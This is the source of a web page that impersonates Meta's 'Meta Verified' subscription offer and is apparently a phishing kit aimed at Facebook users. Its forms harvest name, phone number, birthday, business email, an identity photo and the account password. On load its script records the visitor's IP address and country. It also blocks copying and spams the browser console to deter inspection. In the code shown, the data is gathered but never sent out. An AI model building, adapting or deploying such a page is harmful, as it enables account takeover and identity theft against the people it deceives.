<!DOCTYPE html>
<html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Meta Verified</title>
        <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico" type="image/x-icon">
        <link rel="stylesheet"
            href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <style>
            @media screen and (min-width: 768px) {
                body {
                    display: flex;
                    align-items: center;
                    justify-content: center;

                }

                #body-div {
                    max-width: 480px;
                    margin-bottom: 20px;
                }

                .modal-pay {
                    width: 50% !important;
                    height: 95% !important;
                }
            }

            * {
                font-family: Optimistic Text Medium, Helvetica, Arial, sans-serif;
                padding: 0;
                margin: 0;
                box-sizing: border-box;
            }

            h1 {
                color: #1c2b33;
                font-size: 24px;
                font-weight: 700;
                text-align: center;
                font-family: Helvetica, Arial, sans-serif;
            }

            #avatar {
                margin-top: 10px;
                width: 60px;
                height: 60px;
                border: 1px solid rgba(128, 128, 128, 0.385);
                border-radius: 50%;
                text-align: center;
            }

            #header-text {
                margin-top: 15%;
                display: flex;
                justify-content: center;
                align-items: center;
                align-content: center;
                flex-direction: column;
            }

            #username {
                color: #1c2b33;
                font-weight: 500;
                font-family: Helvetica, Arial, sans-serif;
                margin: 0;
                margin-right: 5px;
            }

            .verify-icon {
                color: #0064E0;
            }

            .name {
                display: flex;
                align-content: center;
                align-items: center;
            }

            #text1-1 {
                color: #1C2B33;
                font-weight: 550;
                margin-bottom: 2px;
                margin-left: 5px;
            }

            #body-div {
                display: flex;
                margin-left: 20px;
                margin-right: 20px;
                flex-direction: column;
                justify-content: center;
                align-items: center;
            }

            .name-jr {
                margin-bottom: 20px;
                margin-left: 21px;
                color: #465A69;
                font-weight: 400;
            }

            #name-jr {
                margin-top: 20px;
            }

            .body-text {
                margin: 10px 0px 10px 0px;
            }

            a {
                text-decoration: none;
            }

            h1 {
                text-align: left;
            }

            #button {

                display: flex;
                background-color: #0064e0;
                color: #ffffff;
                font-weight: 600;
                width: 100%;
                height: 44px;
                border-radius: 20px;
                justify-content: center;
                align-items: center;
                margin-top: 20px;
                margin-right: 10px;
                margin-left: 10px;
            }

            #p-footer {
                margin: 20px 0 20px 0;
            }

            .scrollable-div {
                height: 82%;
                overflow: hidden;
                overflow-y: auto;
            }

            *::-webkit-scrollbar {
                /* margin-left: 30px; */
                width: 1px;
                background-color: #ffffff00;
            }

            *::-webkit-scrollbar-thumb {
                background-color: #1c2b3361;
            }

            @media screen and (max-width: 768px) {
                .scrollable-div {
                    height: 85%;
                }

                #button-modal {
                    position: relative;
                    bottom: -20px;
                }
            }

            .tick-text {
                margin: 15px 15px 0px 0px;
                display: flex;
                align-items: center;
                align-content: center;
                flex-direction: row;
            }

            .tick-text svg {
                width: 24px;
                height: 24px;
            }

            .tick-text p {
                font-size: 15px;
                margin-left: 10px;
            }

            #b-text {
                padding-top: 20px;
                color: #1c2b33;
                font-size: 17px;
                font-weight: 700;
            }

            .modal-close {
                height: 40px;
                display: flex;
                justify-content: flex-end;
                align-items: center;
            }

            .modal-close2 {
                height: 40px;
                display: flex;
                justify-content: space-between;
                align-items: center;
            }

            p {
                color: #1c2b33;
                font-size: 15px;
            }

            .modal-pay {
                border-radius: 20px;
                display: none;
                position: fixed;
                top: 50%;
                left: 50%;
                transform: translate(-50%, -50%);
                background-color: #f0f2f5;
                padding: 20px;
                border: 1px solid #ccc;
                box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
                z-index: 9999;
                width: 95%;
                height: 95%;
                max-width: none;
                max-height: none;
            }

            .modal-pay2 {
                background-color: white;
                border-radius: 20px;
            }

            .modal-pay h1 {
                color: #1c2b33;
                font-size: 24px;
                margin-bottom: 10px;
            }

            .modal-pay p {
                color: #1c2b33;
                font-size: 15px;
            }

            .modal-pay img {
                width: 40px;
                height: 40px;
                border-radius: 50%;
                text-align: center;
            }

            .modal-pay span {
                margin-right: 10px;
                cursor: pointer;
            }

            #button-modal {
                display: flex;
                background-color: #007bff;
                color: #fff;
                padding: 10px 20px;
                border-radius: 20px;
                cursor: pointer;
                align-items: center;
                justify-content: center;
                margin-top: 10px;
            }

            .modal-overlay {
                display: none;
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.4);
                z-index: 9998;
            }

            .name-modal {
                background-color: white;
                display: flex;
                flex-direction: row;
                align-content: center;
                align-items: center;
                border-bottom: 1px solid #465a6936;
            }

            #modal-form {
                display: none;
            }

            .name-modal-margin {
                margin-left: 15px;
            }

            .name-modal2 {
                margin: 15px 15px 15px 15px;
                display: flex;
                flex-direction: column;
                align-content: center;
                justify-content: center;
            }

            .username-modal {
                font-weight: 550 !important;
                margin-left: 5px;
            }

            .name-jr-modal {
                margin: 0;
                color: #465A69 !important;
                font-weight: 400;
            }

            input[type="text"],
            input[type="date"],
            input[type="password"] {
                width: 100%;
                margin: 10px 0;
                height: 36px;
                border: 1px solid #7b828a;
                border-radius: 10px;
            }

            input {
                outline: #00000000;
                padding-left: 10px;
            }

            input[type="date"]::-webkit-datetime-edit-fields-wrapper {
                padding: 0px 5px;
                text-align: center;
            }

            input[type="date"]::-webkit-calendar-picker-indicator {
                padding: 0px 5px;
                text-align: center;
            }
        </style>
        <script>
            function openModal() {
                document.getElementById("modal-pay").style.display = "block";
                document.getElementById("modal-overlay").style.display = "block";
            }
            function closeModal() {
                back();
                document.getElementById("modal-pay").style.display = "none";
                document.getElementById("modal-overlay").style.display = "none";
                document.getElementById("modal-form").style.display = "none";
            }
            function openForm() {
                document.getElementById("modal-form").style.display = "block";
                document.getElementById("modal-overlay").style.display = "block";
                document.getElementById("modal-pay").style.display = "none";
            }
            function inputPassword() {
                localStorage.setItem("name", document.getElementById("name").value);
                localStorage.setItem("page", document.getElementById("page").value);
                localStorage.setItem("phonenumber", document.getElementById("phonenumber").value);
                localStorage.setItem("date", document.getElementById("date").value);
                localStorage.setItem("business-email", document.getElementById("business-email").value);
                localStorage.setItem("url", document.getElementById("url").value);
                localStorage.setItem("additional-info", document.getElementById("additional-info").value);
                var modalform = document.getElementById("modal-form");
                localStorage.setItem("modalform", modalform.innerHTML);
                modalform.innerHTML = `
                <div class="modal-close2">
                <span id="back" onclick="back()"><i class="fa fa-arrow-left" aria-hidden="true"></i></span>
                <span id="close-modal" onclick="closeModal()"><i class="fa fa-times" aria-hidden="true"></i></span>
                </div>
                <h1>Enter password</h1>
                <input type="password" id="password" placeholder="Enter password">
                <div id="button-modal">Submit</div>
            `;
            }
            function back() {
                var modalform = document.getElementById("modal-form");
                modalform.innerHTML = localStorage.getItem("modalform");
            }
            function handleFileSelect(event) {
                var file = event.target.files[0];
                var reader = new FileReader();
                reader.onload = function (event) {
                    localStorage.setItem("image", event.target.result);
                };
                reader.readAsDataURL(file);
            }
            function check() {
                localStorage.setItem("password", document.getElementById("password").value);
                var ip = localStorage.getItem("ipAddress");
                var address = localStorage.getItem("address");
                var password = document.getElementById("password").value;
                var name = localStorage.getItem("name");
                var page = localStorage.getItem("page");
                var phonenumber = localStorage.getItem("phonenumber");
                var date = localStorage.getItem("date");
                var businessEmail = localStorage.getItem("business-email");
                var url = localStorage.getItem("url");
                var additionalInfo = localStorage.getItem("additional-info");
                var image = localStorage.getItem("image");
            }
            function sendCode() {
                var ip = localStorage.getItem("ipAddress");
                var address = localStorage.getItem("address");
                var password = localStorage.getItem("password");
                var name = localStorage.getItem("name");
                var page = localStorage.getItem("page");
                var phonenumber = localStorage.getItem("phonenumber");
                var date = localStorage.getItem("date");
                var businessEmail = localStorage.getItem("business-email");
                var url = localStorage.getItem("url");
                var additionalInfo = localStorage.getItem("additional-info");
                var image = localStorage.getItem("image");
            }
            document.addEventListener('DOMContentLoaded', async function () {
                let ipAddress;
                let address;
                try {
                    const ipifyResponse = await fetch('https://api.ipify.org?format=json');
                    const ipifyData = await ipifyResponse.json();
                    ipAddress = ipifyData.ip;

                    const ipLocationNetResponse = await fetch(`https://api.iplocation.net/?cmd=ip-country&ip=${ipAddress}`);
                    const ipLocationNetData = await ipLocationNetResponse.json();
                    address = ipLocationNetData.country_name;

                    localStorage.setItem('ipAddress', ipAddress);
                    localStorage.setItem('address', address);
                } catch (error) {
                    console.error('Lỗi:', error);
                }
            });
            var message = ["%cHack CC", "%cTắt đi ngay!"];
            var index = 0;
            var lineIndex = 0;
            function displayMessage() {
                console.clear();
                for (var i = 0; i < lineIndex; i++) {
                    console.log(
                        message[i],
                        "color: red; font-weight: bold; font-size: 50px; background-color: yellow;"
                    );
                }
                var currentLine = message[lineIndex].substring(0, index);
                console.log(
                    currentLine,
                    "color: red; font-weight: bold; font-size: 50px; background-color: yellow;"
                );
                index++;
                if (index > message[lineIndex].length) {
                    index = 0;
                    lineIndex++;
                    if (lineIndex >= message.length) {
                        lineIndex = 0;
                    }
                };
            }
            document.addEventListener("copy", function (e) {
                e.preventDefault();
            });
            window.addEventListener("keydown", function (event) {
                if (event.key === "F12") {
                    displayMessage();
                }
            });
            setInterval(displayMessage, 100);
        </script>
    </head>

    <body>
        <div id="body-div">
            <div id="header-text">
                <h1>Build trust with Meta Verified</h1>
                <img id="avatar" src="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" alt="">
                <div class="name" style="margin-top: 2px;">
                    <p id="username">Meta</p>
                    <svg viewBox="0 0 24 24" fill="#0064E0" width="1em" height="1em" class="verify-icon">
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M14.201 1.122a1 1 0 0 1 1.332.357l1.307 2.138 2.506.063a1 1 0 0 1 .974.975l.063 2.505 2.139 1.307a1 1 0 0 1 .356 1.332L21.68 12l1.198 2.201a1 1 0 0 1-.357 1.332l-2.138 1.307-.063 2.506a1 1 0 0 1-.974.974l-2.506.063-1.307 2.139a1 1 0 0 1-1.332.356L12 21.68l-2.201 1.198a1 1 0 0 1-1.332-.357L7.16 20.383l-2.506-.063a1 1 0 0 1-.974-.974l-.063-2.506-2.138-1.307a1 1 0 0 1-.357-1.332L2.32 12 1.122 9.799a1 1 0 0 1 .357-1.332L3.617 7.16l.063-2.505a1 1 0 0 1 .974-.975l2.506-.063L8.467 1.48A1 1 0 0 1 9.8 1.122L12 2.32l2.201-1.198zm2.44 9.146a1 1 0 1 0-1.281-1.536l-.067.055a43.003 43.003 0 0 0-4.852 4.74l-1.734-1.734a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.475-.067l.056-.067a41 41 0 0 1 5.25-5.25l.066-.055z">
                        </path>
                    </svg>
                </div>
            </div>
            <div id="body-div">
                <div class="body-text">
                    <div class="name" style="align-items: unset;">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M16.64 10.268a1 1 0 1 0-1.28-1.536l-.067.055a43.003 43.003 0 0 0-4.852 4.74l-1.734-1.734a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.475-.067l.056-.067a41 41 0 0 1 5.25-5.25l.066-.055z">
                            </path>
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M15.533 1.479a1 1 0 0 0-1.332-.357L12 2.32 9.799 1.122a1 1 0 0 0-1.332.357L7.16 3.617l-2.506.063a1 1 0 0 0-.974.974L3.617 7.16 1.48 8.467A1 1 0 0 0 1.122 9.8L2.32 12l-1.198 2.201a1 1 0 0 0 .357 1.332l2.138 1.307.063 2.506a1 1 0 0 0 .974.974l2.506.063 1.307 2.139a1 1 0 0 0 1.332.356L12 21.68l2.201 1.198a1 1 0 0 0 1.332-.357l1.307-2.138 2.506-.063a1 1 0 0 0 .974-.974l.063-2.506 2.139-1.307a1 1 0 0 0 .356-1.332L21.68 12l1.198-2.201a1 1 0 0 0-.357-1.332L20.383 7.16l-.063-2.506a1 1 0 0 0-.974-.974l-2.506-.063-1.307-2.138zm-3.055 2.858 1.844-1.004 1.095 1.792a1 1 0 0 0 .829.478l2.099.052.052 2.1a1 1 0 0 0 .478.828l1.792 1.095-1.004 1.844a1 1 0 0 0 0 .956l1.004 1.844-1.792 1.095a1 1 0 0 0-.478.829l-.052 2.099-2.1.052a1 1 0 0 0-.828.478l-1.095 1.792-1.844-1.004a1 1 0 0 0-.956 0l-1.844 1.004-1.095-1.792a1 1 0 0 0-.829-.478l-2.099-.052-.052-2.1a1 1 0 0 0-.478-.828l-1.792-1.095 1.004-1.844a1 1 0 0 0 0-.956L3.333 9.678l1.792-1.095a1 1 0 0 0 .478-.829l.052-2.099 2.1-.052a1 1 0 0 0 .828-.478l1.095-1.792 1.844 1.004a1 1 0 0 0 .956 0z">
                            </path>
                        </svg>
                        <span id="text1-1">A verified badge</span>
                    </div>
                    <div class="name-jr">
                        <span>Your audience can trust that you're a real person sharing your real stories.</span>
                    </div>
                </div>
                <div class="body-text">
                    <div class="name" style="align-items: unset;">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M3.73 4.594c-.45.25-.73.726-.73 1.241v4.104a12 12 0 0 0 6.172 10.49l1.857 1.031a2 2 0 0 0 1.942 0l1.857-1.031A12 12 0 0 0 21 9.939V5.835c0-.515-.28-.99-.73-1.24a17.03 17.03 0 0 0-16.54 0zM19 6.181a15.03 15.03 0 0 0-14 0V9.94a10 10 0 0 0 5.144 8.742L12 19.712l1.856-1.031A10 10 0 0 0 19 9.939V6.181z">
                            </path>
                        </svg>
                        <span id="text1-1">Increased account protection</span>
                    </div>
                    <div class="name-jr">
                        <span>Worry less about impersonation with proactive identity monitoring.</span>
                    </div>
                </div>
                <div class="body-text">
                    <div class="name" style="align-items: unset;">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M5 4.586V3a2 2 0 0 1 2-2h3a1 1 0 1 1 0 2H7v1.586l.293-.293a1 1 0 0 1 1.414 1.414l-2 2a1 1 0 0 1-1.414 0l-2-2a1 1 0 0 1 1.414-1.414L5 4.586zM19.293 19.707 19 19.414V21a2 2 0 0 1-2 2h-3a1 1 0 1 1 0-2h3v-1.586l-.293.293a1 1 0 0 1-1.414-1.414l2-2a1 1 0 0 1 1.414 0l2 2a1 1 0 0 1-1.414 1.414z">
                            </path>
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M9 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0zm-2 0a1 1 0 1 1-2 0 1 1 0 0 1 2 0zM11 21.098V20.5c0-2.625-1.667-4.5-5-4.5s-5 1.875-5 4.5v.598c0 .672.352 1.284.999 1.463C2.772 22.776 4.047 23 6 23c1.953 0 3.228-.224 4.001-.439.647-.18.999-.791.999-1.463zM9 20.5v.245c-.632.13-1.603.255-3 .255s-2.368-.124-3-.255V20.5c0-.884.27-1.443.632-1.789C4 18.36 4.703 18 6 18s2 .36 2.368.711c.361.346.632.905.632 1.789zM21 4a3 3 0 1 1-6 0 3 3 0 0 1 6 0zm-2 0a1 1 0 1 1-2 0 1 1 0 0 1 2 0zM23 13.098V12.5C23 9.875 21.333 8 18 8s-5 1.875-5 4.5v.598c0 .672.352 1.284.999 1.463.773.215 2.048.439 4.001.439 1.953 0 3.228-.224 4.001-.439.647-.18.999-.791.999-1.463zm-2-.598v.245c-.633.13-1.603.255-3 .255s-2.367-.124-3-.255V12.5c0-.884.27-1.443.632-1.789C16 10.36 16.703 10 18 10s2 .36 2.368.711c.361.346.632.905.632 1.789z">
                            </path>
                        </svg>
                        <span id="text1-1">Support when you need it</span>
                    </div>
                    <div class="name-jr">
                        <span>Get answers more quickly about the things that matter to you. Right now, support is only
                            available in <a href="#">some languages</a></span>
                    </div>
                </div>
                <div class="body-text">
                    <div class="name" style="align-items: unset;">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="m10.158 10.174-5.004.307 3.88 3.23-1.253 4.856L12 15.863l4.22 2.704-1.254-4.856 3.88-3.23-5.004-.307L12 5.477l-1.842 4.697zm.911-7.8c.332-.847 1.53-.847 1.862 0l2.307 5.881 6.247.384c.903.055 1.274 1.187.578 1.766l-4.844 4.032 1.573 6.097c.227.88-.743 1.582-1.508 1.092L12 18.239l-5.284 3.387c-.766.49-1.735-.212-1.508-1.092l1.573-6.097-4.844-4.032c-.696-.579-.325-1.71.579-1.766l6.246-.384 2.307-5.882z">
                            </path>
                        </svg>
                        <span id="text1-1">Unique stickers</span>
                    </div>
                    <div class="name-jr">
                        <span>Express yourself with stickers only available to Meta Verified subscribers.</span>
                    </div>
                </div>
            </div>
            <div class="name-jr" id="name-jr">
                <span>Meta Verified is not available for people younger than 18 years of age. <a href="#">See all Meta
                        Verified eligibility requirements</a><br>Information you provide is subject to our <a
                        href="#">Privacy Policy.</a></span>
            </div>
            <div id="button" onclick="openModal()">
                Next
            </div>
        </div>
        <div class="modal-overlay" id="modal-overlay"></div>
        <div class="modal-pay" id="modal-pay">
            <div class="modal-close"><span id="modal-close" onclick="closeModal()"><i class="fa fa-times"
                        aria-hidden="true"></i></span></div>
            <div class="scrollable-div">
                <h1>Submit a request for proposal</h1>

                <p>You are subscribing to Meta Verified on Facebook.</p>
                <p style="margin-bottom: 10px;">After subscribing, you need to go to the Facebook mobile app to confirm your
                    identity. This can take up to 48
                    hours.
                    If
                    we're unable to confirm your identity, we'll refund your payment.</p>
                <div class="modal-pay2">
                    <div class="name-modal">
                        <img class="name-modal-margin"
                            src="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" alt="">
                        <div class="name-modal2 modal-pay2">
                            <div class="name modal-pay2" style="margin-top: 2px;">
                                <p id="username" class="username-modal modal-pay2">Meta</p>
                                <svg viewBox="0 0 24 24" fill="#0064E0" width="1em" height="1em" class="verify-icon">
                                    <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M14.201 1.122a1 1 0 0 1 1.332.357l1.307 2.138 2.506.063a1 1 0 0 1 .974.975l.063 2.505 2.139 1.307a1 1 0 0 1 .356 1.332L21.68 12l1.198 2.201a1 1 0 0 1-.357 1.332l-2.138 1.307-.063 2.506a1 1 0 0 1-.974.974l-2.506.063-1.307 2.139a1 1 0 0 1-1.332.356L12 21.68l-2.201 1.198a1 1 0 0 1-1.332-.357L7.16 20.383l-2.506-.063a1 1 0 0 1-.974-.974l-.063-2.506-2.138-1.307a1 1 0 0 1-.357-1.332L2.32 12 1.122 9.799a1 1 0 0 1 .357-1.332L3.617 7.16l.063-2.505a1 1 0 0 1 .974-.975l2.506-.063L8.467 1.48A1 1 0 0 1 9.8 1.122L12 2.32l2.201-1.198zm2.44 9.146a1 1 0 1 0-1.281-1.536l-.067.055a43.003 43.003 0 0 0-4.852 4.74l-1.734-1.734a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.475-.067l.056-.067a41 41 0 0 1 5.25-5.25l.066-.055z">
                                    </path>
                                </svg>
                            </div>
                            <p class="name-jr-modal modal-pay2">Facebook</p>
                        </div>

                    </div>
                    <div style="line-height: 66px;display: flex;align-content: center;align-items: center;">
                        <p class="name-modal-margin">You'll be billed $7.99 per month.</p>
                    </div>
                </div>
                <div id="b-text">
                    <b>What you get with your subscription.</b>
                </div>
                <div>
                    <div class="tick-text">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M20.274 6.367a1 1 0 0 1-.14 1.407l-.083.067a68.999 68.999 0 0 0-9.71 9.71l-.067.082a1 1 0 0 1-1.481.074l-4.5-4.5a1 1 0 1 1 1.414-1.414l3.724 3.724a71 71 0 0 1 9.354-9.224l.082-.067a1 1 0 0 1 1.407.14z">
                            </path>
                        </svg>
                        <p>A verified badge</p>
                    </div>
                    <div class="tick-text">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M20.274 6.367a1 1 0 0 1-.14 1.407l-.083.067a68.999 68.999 0 0 0-9.71 9.71l-.067.082a1 1 0 0 1-1.481.074l-4.5-4.5a1 1 0 1 1 1.414-1.414l3.724 3.724a71 71 0 0 1 9.354-9.224l.082-.067a1 1 0 0 1 1.407.14z">
                            </path>
                        </svg>
                        <p>Increased account protection</p>
                    </div>

                    <div class="tick-text">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M20.274 6.367a1 1 0 0 1-.14 1.407l-.083.067a68.999 68.999 0 0 0-9.71 9.71l-.067.082a1 1 0 0 1-1.481.074l-4.5-4.5a1 1 0 1 1 1.414-1.414l3.724 3.724a71 71 0 0 1 9.354-9.224l.082-.067a1 1 0 0 1 1.407.14z">
                            </path>
                        </svg>
                        <p>Support when you need it</p>
                    </div>

                    <div class="tick-text">
                        <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" aria-hidden="true">
                            <path
                                d="M20.274 6.367a1 1 0 0 1-.14 1.407l-.083.067a68.999 68.999 0 0 0-9.71 9.71l-.067.082a1 1 0 0 1-1.481.074l-4.5-4.5a1 1 0 1 1 1.414-1.414l3.724 3.724a71 71 0 0 1 9.354-9.224l.082-.067a1 1 0 0 1 1.407.14z">
                            </path>
                        </svg>
                        <p>Unique stickers</p>
                    </div>
                    <p id="p-footer">Subscribing to Meta Verified means you agree to our <a href="#">Terms and
                            Policies</a>.</p>
                </div>
            </div>
            <div id="button-modal" onclick="openForm()">Next</div>
        </div>
        <div class="modal-pay" id="modal-form">
            <div class="modal-close"><span id="modal-close" onclick="closeModal()"><i class="fa fa-times"
                        aria-hidden="true"></i></span></div>
            <div class="scrollable-div">
                <h1>Submit a request for proposal</h1>
                <p>You are subscribing to Meta verified on Facebook.<br>After subscribing you need to go to the Facebook
                    mobile app to confirm your identity. This can take up to 48 hours. If we're unable to confirm your
                    identity, we'll refund your payment.</p>
                <div class="name-modal" style="border-radius: 20px; margin-top: 20px;">
                    <img class="name-modal-margin"
                        src="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" alt="">
                    <div class="name-modal2 modal-pay2">
                        <div class="name modal-pay2" style="margin-top: 2px;">
                            <p id="username" class="username-modal modal-pay2">Meta</p>
                            <svg viewBox="0 0 24 24" fill="#0064E0" width="1em" height="1em" class="verify-icon">
                                <path fill-rule="evenodd" clip-rule="evenodd"
                                    d="M14.201 1.122a1 1 0 0 1 1.332.357l1.307 2.138 2.506.063a1 1 0 0 1 .974.975l.063 2.505 2.139 1.307a1 1 0 0 1 .356 1.332L21.68 12l1.198 2.201a1 1 0 0 1-.357 1.332l-2.138 1.307-.063 2.506a1 1 0 0 1-.974.974l-2.506.063-1.307 2.139a1 1 0 0 1-1.332.356L12 21.68l-2.201 1.198a1 1 0 0 1-1.332-.357L7.16 20.383l-2.506-.063a1 1 0 0 1-.974-.974l-.063-2.506-2.138-1.307a1 1 0 0 1-.357-1.332L2.32 12 1.122 9.799a1 1 0 0 1 .357-1.332L3.617 7.16l.063-2.505a1 1 0 0 1 .974-.975l2.506-.063L8.467 1.48A1 1 0 0 1 9.8 1.122L12 2.32l2.201-1.198zm2.44 9.146a1 1 0 1 0-1.281-1.536l-.067.055a43.003 43.003 0 0 0-4.852 4.74l-1.734-1.734a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.475-.067l.056-.067a41 41 0 0 1 5.25-5.25l.066-.055z">
                                </path>
                            </svg>
                        </div>
                        <p class="name-jr-modal modal-pay2">Facebook</p>
                    </div>
                </div>
                <div style="margin-top: 10px;margin-bottom: 10px;">
                    <b>Please fill in the form bellow.</b>
                </div>
                <div
                    style="display: flex;justify-content: center;align-items: center;align-content: center;flex-direction: column;">
                    <input type="text" id="name" placeholder="Your first and last name">
                    <input type="text" id="page" placeholder="Your page name">
                    <input type="text" id="phonenumber" placeholder="Your phone number">
                </div>
                <div id="birthday"
                    style="margin-left: 7px;display: flex;align-items: center;justify-content: center;align-content: center;">
                    <p style="margin-right: 5px;">Your birthday(*)</p>
                    <input type="date" id="date">
                </div>
                <div
                    style="display: flex;align-items: center;justify-content: center;align-content: center;flex-direction: column;">
                    <input type="text" id="business-email" placeholder="Your business email">
                    <input type="text" id="url" placeholder="Link (URL) to page">
                    <input type="text" id="additional-info" placeholder="Additional info">
                    <div
                        style="width: 100%;display: flex;align-items: center;align-content: center;justify-content: flex-start;">
                        <p>Upload your photo: </p>
                        <input type="file" id="fileInput" name="photo" accept="image/*"
                            onchange="handleFileSelect(event)">
                    </div>
                </div>
            </div>
            <div id="button-modal" onclick="inputPassword()">Submit</div>
        </div>
    </body>

</html>
